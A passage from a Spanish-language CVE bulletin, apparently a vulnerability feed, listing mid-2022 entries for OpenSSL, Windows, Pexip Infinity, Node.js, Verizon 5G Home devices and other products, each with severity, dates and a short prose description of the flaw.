    Severidad: MEDIA
    Fecha de publicación: 05/07/2022
    Fecha de última actualización: 08/08/2023
    El modo AES OCB para plataformas x86 de 32 bits que utilizan la implementación optimizada de ensamblaje AES-NI no cifrará la totalidad de los datos en algunas circunstancias. Esto podría revelar dieciséis bytes de datos que ya existían en la memoria y que no estaban escritos. En el caso especial del cifrado "in situ", se revelarían dieciséis bytes del texto sin formato. Dado que OpenSSL no es compatible con conjuntos de cifrado basados ??en OCB para TLS y DTLS, ambos no están afectados. Corregido en OpenSSL versión 3.0.5 (Afectado 3.0.0-3.0.4). Corregido en OpenSSL 1.1.1q (Afectado 1.1.1-1.1.1p)
  • CVE-2022-29512
    Severidad: MEDIA
    Fecha de publicación: 10/07/2022
    Fecha de última actualización: 08/08/2023
    Una exposición de información confidencial a un actor no autorizado en múltiples aplicaciones de Cybozu Garoon versiones 4.0.0 hasta 5.9.1, permite a un atacante remoto autenticado obtener los datos sin el privilegio de visualización
  • CVE-2022-35411
    Severidad: ALTA
    Fecha de publicación: 08/07/2022
    Fecha de última actualización: 08/08/2023
    rpc.py versiones hasta 0.6.0, permite una Ejecución de Código Remota porque es producido un unpickle cuando es enviado el encabezado HTTP "serializer: pickle". En otras palabras, aunque JSON (no Pickle) es el formato de datos por defecto, un cliente no autenticado puede causar que los datos sean procesados con unpickle
  • CVE-2022-30290
    Severidad: MEDIA
    Fecha de publicación: 05/07/2022
    Fecha de última actualización: 08/08/2023
    En OpenCTI versiones hasta 5.2.4, se identificó una vulnerabilidad de control de acceso roto en el extremo del perfil. Un atacante puede abusar de la vulnerabilidad identificada para cambiar arbitrariamente su dirección de correo electrónico registrada, así como su clave API, aunque tal acción no sea posible por medio de la interfaz, legítimamente
  • CVE-2022-26054
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de operación en Link de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado alterar los datos de Link
  • CVE-2022-26051
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de operación en Portal de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado alterar los datos de Portal
  • CVE-2022-26368
    Severidad: MEDIA
    Fecha de publicación: 04/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de omisión de restricciones de navegación y omisión de restricciones de operación en Cabinet de Cybozu Garoon versiones 4.0.0 a 5.5.1, permite a un atacante remoto autenticado alterar y/u obtener los datos de Cabinet
  • CVE-2022-32295
    Severidad: ALTA
    Fecha de publicación: 30/06/2022
    Fecha de última actualización: 08/08/2023
    En los dispositivos Ampere Altra y AltraMax anteriores a SRP 1.09, el diseño de referencia Altra de los accesos UEFI permite el acceso inseguro a SPI-NOR por parte del componente OS/hypervisor
  • CVE-2022-31032
    Severidad: MEDIA
    Fecha de publicación: 29/06/2022
    Fecha de última actualización: 21/07/2023
    Tuleap es una suite libre y de código abierto para mejorar la administración de los desarrollos de software y la colaboración. En versiones anteriores a 13.9.99.58, las autorizaciones no son verificadas apropiadamente cuando son creados proyectos o trackers a partir de proyectos marcados como plantillas. Los usuarios pueden acceder a la información de esos proyectos de plantilla porque el modelo de permisos no es aplicado apropiadamente. Es recomendado a usuarios actualizar. No se presentan mitigaciones conocidas para este problema
  • CVE-2022-34826
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/07/2022
    Fecha de última actualización: 08/08/2023
    En Couchbase Server versiones 7.1.x anteriores a 7.1.1, una frase de contraseña encriptada de la clave privada puede filtrarse en los registros
  • CVE-2022-32409
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de inclusión de archivos locales (LFI) en el componente codemirror.php del Portal do Software Publico Brasileiro i3geo versión v7.0.5, permite a atacantes ejecutar código PHP arbitrario por medio de una petición HTTP diseñada
  • CVE-2021-26384
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    Un comando SMI (System Management Interface) malformado puede permitir a un atacante establecer una estructura de datos SMI Trigger Info corrupta, conllevando potencialmente a lecturas y escrituras de memoria fuera de límites cuando es desencadenado un SMI resultando en una potencial pérdida de recursos
  • CVE-2021-40012
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de uso incorrecto de punteros durante la transmisión de datos en video framework. Una explotación con éxito de esta vulnerabilidad puede afectar a la confidencialidad
  • CVE-2021-40016
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de control de permisos inapropiada en el módulo de Bluetooth. Una explotación con éxito de esta vulnerabilidad afectará a la confidencialidad
  • CVE-2021-40013
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad de control de permisos inapropiados en el módulo de Bluetooth: una explotación con éxito de esta vulnerabilidad afectará a la integridad
  • CVE-2022-25858
    Severidad: Pendiente de análisis
    Fecha de publicación: 15/07/2022
    Fecha de última actualización: 08/08/2023
    El paquete terser versiones anteriores a 4.8.1, a partir de la versión 5.0.0 anteriores a 5.14.2, son vulnerables a una Denegación de Servicio por Expresión Regular (ReDoS) debido al uso no seguro de expresiones regulares
  • CVE-2022-21845
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Windows Kernel
  • CVE-2022-22047
    Severidad: ALTA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Windows CSRSS. Este ID de CVE es diferente de CVE-2022-22026, CVE-2022-22049
  • CVE-2022-22045
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Windows.Devices.Picker.dll
  • CVE-2022-22042
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Windows Hyper-V. Este ID de CVE es diferente de CVE-2022-30223
  • CVE-2022-22043
    Severidad: ALTA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad de elevación de privilegios del controlador del sistema de archivos FAT de Windows
  • CVE-2022-22041
    Severidad: ALTA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Print Spooler. Este ID de CVE es diferente de CVE-2022-22022, CVE-2022-30206, CVE-2022-30226
  • CVE-2022-22027
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Windows Fax Service. Este ID de CVE es diferente de CVE-2022-22024
  • CVE-2022-22028
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Windows Network File System
  • CVE-2022-22029
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Windows Network File System. Este ID de CVE es diferente de CVE-2022-22039
  • CVE-2022-22031
    Severidad: ALTA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Windows Credential Guard Domain-joined Public Key
  • CVE-2022-22036
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios de Performance Counters for Windows
  • CVE-2022-22037
    Severidad: ALTA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Elevación de Privilegios en Windows Advanced Local Procedure Call. Este ID de CVE es diferente de CVE-2022-30202, CVE-2022-30224
  • CVE-2022-22038
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Ejecución de Código Remota en Remote Procedure Call Runtime
  • CVE-2022-22039
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Vulnerabilidad de ejecución remota de código en el sistema de archivos de red de Windows. Este CVE ID es único de CVE-2022-22029.
  • CVE-2022-22040
    Severidad: ALTA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Denegación de Servicio en Internet Information Services Dynamic Compression Module
  • CVE-2022-32263
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones anteriores a 28.1, permite a atacantes remotos desencadenar una interrupción del software por medio de G.719
  • CVE-2022-26352
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en la API ContentResource de dotCMS versiones 3.0 hasta 22.02. Los atacantes pueden diseñar una petición de formulario multiparte para publicar un archivo cuyo nombre de archivo no está inicialmente saneado. Esto permite un salto de directorio, en el que el archivo es guardado fuera de la ubicación de almacenamiento prevista. Si la creación de contenido anónimo está habilitada, esto permite a un atacante no autenticado subir un archivo ejecutable, como un archivo .jsp, que puede conllevar a una ejecución de código remota
  • CVE-2021-46784
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    En Squid versiones 3.x hasta 3.5.28, versiones 4.x hasta 4.17 y versiones 5.x anteriores a 5.6, debido a una administración inapropiada del búfer, puede producirse una denegación de servicio cuando son procesadas respuestas largas del servidor Gopher
  • CVE-2022-27936
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity antes de 27.3 permite a atacantes remotos desencadenar una interrupción del software por medio de H.323
  • CVE-2022-27935
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones anteriores a 27.3, permite a atacantes remotos desencadenar una interrupción del software por medio de Epic Telehealth
  • CVE-2022-27934
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones anteriores a 27.3, permite a atacantes remotos desencadenar una interrupción del software por medio de HTTP
  • CVE-2022-27933
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones anteriores a 27.3, permite a atacantes remotos desencadenar una interrupción del software por medio de One Touch Join
  • CVE-2022-27932
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones anteriores a 27.3, permite a atacantes remotos desencadenar una interrupción del software por medio de One Touch Join
  • CVE-2022-27931
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones anteriores a 27.3, permite a atacantes remotos desencadenar una interrupción del software por medio del Protocolo de Iniciación de Sesión
  • CVE-2022-27930
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones 27.x anteriores a 27.3, permite a atacantes remotos desencadenar una interrupción del software por medio del inicio de sesión único si es adivinado un identificador único universal aleatorio
  • CVE-2022-27929
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones 27.x anteriores a 27.3, permite a atacantes remotos desencadenar una interrupción del software por medio de HTTP
  • CVE-2022-31260
    Severidad: Pendiente de análisis
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    En Montala ResourceSpace versiones hasta 9.8 anteriores a r19636, el archivo csv_export_results_metadata.php permite a atacantes exportar los metadatos de la colección por medio de un valor k no NULL
  • CVE-2022-29900
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 21/07/2023
    Las predicciones de bifurcación mal entrenadas para las instrucciones de retorno pueden permitir la ejecución arbitraria de código especulativo bajo ciertas condiciones dependientes de la microarquitectura
  • CVE-2022-35404
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/07/2022
    Fecha de última actualización: 08/08/2023
    ManageEngine Password Manager Pro versiones 12100 y anteriores y OPManager versiones 126100 y anteriores son vulnerables a una creación no autorizada de archivos y directorios en un equipo servidor
  • CVE-2022-30620
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/07/2022
    Fecha de última actualización: 08/08/2023
    En la cámara Cellinx con el invitado habilitado, el atacante con acceso a la web puede elevar privilegios a administrativos: "1" a "0" cambiando los siguientes valores de cookie "is_admin", "showConfig". Privilegios administrativos que permiten cambiar varias configuraciones en la cámara
  • CVE-2022-26654
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones anteriores a 27.3, permite a atacantes remotos forzar una interrupción del software por medio de HTTP
  • CVE-2022-25357
    Severidad: MEDIA
    Fecha de publicación: 17/07/2022
    Fecha de última actualización: 08/08/2023
    Pexip Infinity versiones 27.x anteriores a 27.2, presenta un control de acceso inapropiado. Un atacante puede en ocasiones unirse a una conferencia (call join) si presenta un bloqueo pero no un PIN
  • CVE-2022-23142
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/07/2022
    Fecha de última actualización: 08/08/2023
    ZXEN versión CG200, presenta una vulnerabilidad DoS. Un atacante podría construir y enviar un gran número de peticiones HTTP GET en poco tiempo, lo que puede hacer que los sitios web de administración de productos no sean accesibles
  • CVE-2022-21144
    Severidad: MEDIA
    Fecha de publicación: 01/05/2022
    Fecha de última actualización: 08/08/2023
    Esto afecta a todas las versiones del paquete libxmljs. Cuando es invocada la función libxmljs.parseXml con un argumento que no es un buffer, el código V8 intentará invocar el método .toString del argumento. Si el valor toString del argumento no es un objeto Function, V8 será bloqueado
  • CVE-2022-22473
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    IBM WebSphere Application Server versiones 7.0, 8.0, 8.5 y 9.0 podría permitir a un atacante remoto obtener información confidencial causada por un manejo inapropiado de los datos de la Consola Administrativa. Esta información podría usarse en otros ataques contra el sistema. IBM X-Force ID: 225347
  • CVE-2021-39017
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    IBM Engineering Lifecycle Optimization - Publishing versiones 6.0.6, 6.0.6.1, 7.0, 7.0.1 y 7.0.2, podría permitir a un atacante remoto cargar archivos arbitrarios, causado por controles de acceso inapropiados. IBM X-Force ID: 213725
  • CVE-2021-45492
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    En Sage 300 ERP (anteriormente accpac) versiones hasta 6.8.x, el instalador configura el directorio C:\Sage\Sage300\Runtime para que sea la primera entrada en la variable de entorno PATH del sistema. Sin embargo, este directorio puede ser escrito por usuarios no privilegiados porque el instalador de Sage no establece permisos explícitos y, por lo tanto, hereda los permisos débiles de la carpeta C:\N. Debido a que las entradas en la variable PATH de todo el sistema son incluidas en el orden de búsqueda de DLLs, un atacante podría llevar a cabo el secuestro del orden de búsqueda de DLLs para escalar sus privilegios a SYSTEM. Además, si la funcionalidad de Búsqueda Global o Pantallas Web está habilitada, entonces es posible una escalada de privilegios por medio de los servicios GlobalSearchService y Sage.CNA.WindowsService, de nuevo por medio del secuestro del orden de búsqueda de DLL porque los usuarios no privilegiados tendrían permisos de modificación en el directorio de la aplicación. Tenga en cuenta que mientras las versiones más antiguas del software son instaladas por defecto en %PROGRAMFILES(X86)% (lo que permitiría que la carpeta Sage heredara permisos fuertes, haciendo que la instalación no fuera vulnerable), las guías oficiales de instalación de Sage 300 para esas versiones recomiendan instalar en C:\NSage, lo que haría que la instalación fuera vulnerable
  • CVE-2022-32222
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 24/07/2023
    Se presenta una vulnerabilidad criptográfica en Node.js en linux en versiones 18.x anteriores a 18.40.0, que permitía una ruta por defecto para openssl.cnf que podría ser accesible en algunas circunstancias para un usuario no administrador en lugar de /etc/ssl como era el caso en las versiones anteriores a la actualización a OpenSSL 3
  • CVE-2022-32215
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 18/07/2023
    El parser llhttp anteriores a la versión v14.20.1, anteriores a la versión v16.17.1 y anteriores a la versión v18.9.1 del módulo http en Node.js no maneja correctamente las cabeceras Transfer-Encoding de varias líneas. Esto puede llevar al contrabando de solicitudes HTTP (HRS)
  • CVE-2022-32214
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 18/07/2023
    El parser llhttp anteriores a la versión v14.20.1, anteriores a la versión v16.17.1 y anteriores a la versión v18.9.1 del módulo http en Node.js no utiliza estrictamente la secuencia CRLF para delimitar las peticiones HTTP. Esto puede llevar a un contrabando de peticiones HTTP (HRS)
  • CVE-2022-32213
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 18/07/2023
    El analizador llhttp anteriores a la versión v14.20.1, anteriores a la versión v16.17.1 y anteriores a la versión v18.9.1 del módulo http en Node.js no analiza y valida correctamente las cabeceras Transfer-Encoding y puede dar lugar a HTTP Request Smuggling (HRS)
  • CVE-2022-28375
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    Verizon 5G Home LVSKIHP OutDoorUnit (ODU) versión 3.33.101.0, no sanea apropiadamente los parámetros controlados por el usuario dentro de la función crtcswitchsimprofile del listener JSON de crtcrpc. Un atacante remoto en la red local puede inyectar meta caracteres de shell en el archivo /usr/lib/lua/5.1/luci/controller/rpc.lua para lograr una ejecución de código remota como root
  • CVE-2022-28374
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    Verizon 5G Home LVSKIHP OutDoorUnit (ODU) versión 3.33.101.0, no sanea apropiadamente los parámetros controlados por el usuario dentro de las URLs DMACC en la página de Ajustes del portal de Ingeniería. Un atacante remoto autenticado en la red local puede inyectar meta caracteres de shell en el archivo /usr/lib/lua/5.1/luci/controller/admin/settings.lua para lograr una ejecución de código remota como root
  • CVE-2022-28371
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    En los dispositivos InDoorUnit (IDU) versión 3.4.66.162 y OutDoorUnit (ODU) versión 3.33.101.0 de Verizon 5G Home LVSKIHP, los endpoints RPC de CRTC y ODU dependen de un certificado estático para el control de acceso. Este certificado está integrado en el firmware y es idéntico en toda la flota de dispositivos. Un atacante sólo necesita descargar este firmware y extraer los componentes privados de estos certificados (de /etc/lighttpd.d/ca.pem y /etc/lighttpd.d/server.pem) para conseguir acceso. (La ubicación de la descarga del firmware es mostrada en los registros de actualización del dispositivo)
  • CVE-2022-28370
    Severidad: Pendiente de análisis
    Fecha de publicación: 14/07/2022
    Fecha de última actualización: 08/08/2023
    En los dispositivos Verizon 5G Home LVSKIHP OutDoorUnit (ODU) versión 3.33.101.0, el endpoint RPC crtc_fw_upgrade proporciona un medio para aprovisionar una actualización de firmware para el dispositivo. /lib/functions/wnc_jsonsh/wnc_crtc_fw.sh no presenta ninguna comprobación criptográfica de la imagen, lo que permite a un atacante modificar el firmware instalado
  • CVE-2022-22048
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Omisión de la Funcionalidad de Seguridad de BitLocker
  • CVE-2022-22711
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Windows BitLocker
  • CVE-2022-35405
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine Password Manager Pro versiones anteriores a 12101 y PAM360 versiones anteriores a 5510, son vulnerables a una ejecución de código remota sin autenticación. (Esto también afecta a ManageEngine Access Manager Plus versiones anteriores a 4303 con autenticación).
  • CVE-2022-22360
    Severidad: Pendiente de análisis
    Fecha de publicación: 19/07/2022
    Fecha de última actualización: 08/08/2023
    IBM Sterling Partner Engagement Manager versiones 6.1.2, 6.2 y Cloud/SasS versión 22.2, podrían permitir a un atacante remoto autenticado conducir una inyección LDAP. Al usar una petición especialmente diseñada, un atacante podría explotar esta vulnerabilidad y podría resultar en la concesión de permisos a recursos no autorizados. IBM X-Force ID: 220782.
  • CVE-2022-30187
    Severidad: BAJA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 08/08/2023
    Una Vulnerabilidad de Divulgación de Información de Azure Storage Library
  • CVE-2022-26777
    Severidad: MEDIA
    Fecha de publicación: 16/04/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine Remote Access Plus versiones anteriores a 10.1.2137.15, permite a usuarios invitados visualizar los detalles de la licencia
  • CVE-2022-26653
    Severidad: MEDIA
    Fecha de publicación: 16/04/2022
    Fecha de última actualización: 08/08/2023
    Zoho ManageEngine Remote Access Plus versiones anteriores a 10.1.2137.15, permite a usuarios invitados visualizar los detalles del dominio (como el nombre de usuario y el GUID de un administrador)
  • CVE-2022-28860
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/07/2022
    Fecha de última actualización: 08/08/2023
    Una disminución de la autenticación en el servidor en Citilog versión 8.0, permite a un atacante (en una posición de tipo man in the middle entre el servidor y su cámara inteligente Axis M1125) conseguir acceso HTTP a la cámara
  • CVE-2022-20218
    Severidad: MEDIA
    Fecha de publicación: 13/07/2022
    Fecha de última actualización: 08/08/2023
    En la función PermissionController, se presenta una posible forma de conseguir y retener permisos sin el consentimiento del usuario debido a un error lógico en el código. Esto podría conllevar a una escalada local de privilegios sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-12, ID de Android: A-223907044
  • CVE-2022-20219
    Severidad: BAJA
    Fecha de publicación: 13/07/2022
    Fecha de última actualización: 08/08/2023
    En varias funciones de StorageManagerService.java y UserManagerService.java, es posible dejar los directorios del usuario sin cifrar debido a un error lógico en el código. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. No es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-224585613
  • CVE-2022-35857
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/07/2022
    Fecha de última actualización: 08/08/2023
    kvf-admin versiones hasta 12-02-2022, permite a atacantes remotos ejecutar código arbitrario porque la deserialización es manejada inapropiadamente. El parámetro rememberMe está encriptado con una clave embebida del archivo com.kalvin.kvf.common.shiro.ShiroConfig
  • CVE-2022-27191
    Severidad: MEDIA
    Fecha de publicación: 18/03/2022
    Fecha de última actualización: 08/08/2023
    El paquete golang.org/x/crypto/ssh anterior a 0.0.0-20220314234659-1baeb1ce4c0b para Go permite a un atacante bloquear un servidor en ciertas circunstancias que implican AddHostKey
  • CVE-2022-34503
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que QPDF versión v8.4.2, contiene un desbordamiento del búfer de la pila por medio de la función QPDF::processXRefStream. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio de un archivo PDF diseñado
  • CVE-2022-34502
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que Radare2 versión v5.7.0, contiene un desbordamiento del búfer de la pila por medio de la función consume_encoded_name_new en el archivo format/wasm/wasm.c. Esta vulnerabilidad permite a atacantes causar una denegación de servicio (DoS) por medio de un archivo binario diseñado
  • CVE-2022-28771
    Severidad: MEDIA
    Fecha de publicación: 12/07/2022
    Fecha de última actualización: 14/08/2023
    Debido a una falta de comprobación de la autenticación, la API del servicio de licencias de SAP Business one - versión 10.0 permite a un atacante no autenticado enviar peticiones http maliciosas a través de la red. Si es explotado con éxito, un atacante puede romper toda la aplicación haciéndola inaccesible
  • CVE-2022-34113
    Severidad: Pendiente de análisis
    Fecha de publicación: 22/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema en el componente /api/plugin/upload de Dataease v1.11.1, permite a atacantes ejecutar código arbitrario por medio de un plugin diseñado
  • CVE-2022-22969
    Severidad: MEDIA
    Fecha de publicación: 21/04/2022
    Fecha de última actualización: 08/08/2023
    (Descripción del problema) Spring Security OAuth versiones 2.5.x anteriores a 2.5.2 y las versiones más antiguas no soportadas, son susceptibles a un ataque de denegación de servicio (DoS) por medio de la iniciación de la petición de autorización en una aplicación cliente OAuth versión 2.0. Un usuario o atacante malicioso puede enviar múltiples peticiones iniciando la Solicitud de Autorización para la Concesión del Código de Autorización, lo que presenta el potencial de agotar los recursos del sistema usando una sola sesión. Esta vulnerabilidad sólo expone las aplicaciones OAuth versión 2.0 Client
  • CVE-2022-23773
    Severidad: MEDIA
    Fecha de publicación: 11/02/2022
    Fecha de última actualización: 08/08/2023
    cmd/go en Go versiones anteriores a 1.16.14 y versiones 1.17.x anteriores a 1.17.7, puede malinterpretar nombres de rama que falsamente parecen ser etiquetas de versión. Esto puede conllevar a un control de acceso incorrecto si supone que un actor puede crear ramas pero no etiquetas
  • CVE-2022-35288
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    IBM Security Verify Information Queue versión 10.0.2, podría permitir a un usuario obtener información confidencial que podría usarse en otros ataques contra el sistema. IBM X-Force ID: 230818
  • CVE-2021-46829
    Severidad: Pendiente de análisis
    Fecha de publicación: 24/07/2022
    Fecha de última actualización: 08/08/2023
    GdkPixbuf de GNOME (también se conoce como GDK-PixBuf) versiones anteriores a 2.42.8, permite un desbordamiento del búfer en la región heap de la memoria cuando son compuestos o borran fotogramas en archivos GIF, como es demostrado por el archivo io-gif-animation.c composite_frame. Este desbordamiento es controlable y podría ser abusado para la ejecución de código, especialmente en sistemas de 32 bits
  • CVE-2022-20230
    Severidad: BAJA
    Fecha de publicación: 13/07/2022
    Fecha de última actualización: 08/08/2023
    En la función choosePrivateKeyAlias del archivo KeyChain.java, se presenta un posible acceso al certificado del usuario debido a una comprobación de entrada inapropiada. Esto podría conllevar a una divulgación de información local sin ser necesarios privilegios de ejecución adicionales. Es requerida una interacción del usuario para su explotación. Producto: Android, Versiones: Android-10 Android-11 Android-12 Android-12L, ID de Android: A-221859869
  • CVE-2022-34749
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    En mistune versiones hasta 2.0.2, la compatibilidad con el marcado en línea es implementado mediante el uso de expresiones regulares que pueden implicar una gran cantidad de retroceso en determinados casos límite. Este comportamiento es comúnmente llamado backtracking catastrófico.
  • CVE-2022-34574
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Wavlink WiFi-Repeater versión RPTA2-77W.M4300.01.GD.2017Sep19, permite a atacantes obtener la información clave del dispositivo por medio del acceso al archivo Tftpd32.ini
  • CVE-2022-34573
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Wavlink WiFi-Repeater versión RPTA2-77W.M4300.01.GD.2017Sep19, permite a atacantes configurar arbitrariamente los ajustes del dispositivo por medio del acceso a la página mb_wifibasic.shtml
  • CVE-2022-34572
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Wavlink WiFi-Repeater versión RPTA2-77W.M4300.01.GD.2017Sep19, permite a atacantes obtener la contraseña de telnet por medio del acceso a la página tftp.txt
  • CVE-2022-34571
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en Wavlink WiFi-Repeater versión RPTA2-77W.M4300.01.GD.2017Sep19, permite a atacantes obtener la información de la clave del sistema y ejecutar comandos arbitrarios por medio del acceso a la página syslog.shtml
  • CVE-2022-34907
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    Se presenta una vulnerabilidad de omisión de autenticación en FileWave versiones anteriores a 14.6.3 y versiones 14.7.x anteriores a 14.7.2. Su explotación podría permitir a un actor no autenticado acceder al sistema con la máxima autoridad posible y conseguir el control total de la plataforma FileWave
  • CVE-2022-34966
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado que OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK versión v6.3 LTS, contiene una vulnerabilidad de inyección HTML por medio del parámetro location en http://ip_address/:port/ossn/home
  • CVE-2021-38936
    Severidad: Pendiente de análisis
    Fecha de publicación: 20/07/2022
    Fecha de última actualización: 08/08/2023
    IBM QRadar SIEM versiones7.3, 7.4 y 7.5, podría divulgar información altamente confidencial a un usuario privilegiado. IBM X-Force ID: 210893
  • CVE-2021-33437
    Severidad: Pendiente de análisis
    Fecha de publicación: 26/07/2022
    Fecha de última actualización: 08/08/2023
    Se ha detectado un problema en mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript versión 6). Se presenta una pérdida de memoria en la función frozen_cb() en el archivo mjs.c.
  • CVE-2022-31475
    Severidad: Pendiente de análisis
    Fecha de publicación: 21/07/2022
    Fecha de última actualización: 08/08/2023
